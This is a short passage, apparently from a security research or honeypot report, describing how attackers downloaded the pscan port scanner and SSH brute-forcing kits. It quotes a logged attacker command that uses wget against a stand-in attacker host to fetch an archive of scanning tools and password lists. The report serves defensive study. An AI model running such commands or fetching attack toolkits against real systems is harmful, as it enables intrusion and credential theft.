Scanning Tools

Among other tools, attackers commonly downloaded and attempted to use a variant of pscan. Pscan is an efficient port scanner that can discover hosts which are listening on a particular port. Typically, the attacker would run the tool, obtain a list of hosts with the port open and then proceed to run an exploit tool against the list of hosts.

Date: 2006-09-09 12:20:40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: wget http://evil.example.com/linux/fast.tgz

Figure 2. An attempt by an attacker to download an archive including a variant of the pscan tool.

This archive contained SSH scanning tools, including pscan, a password list, and a list of servers and their root passwords or other user accounts that had been guessed already.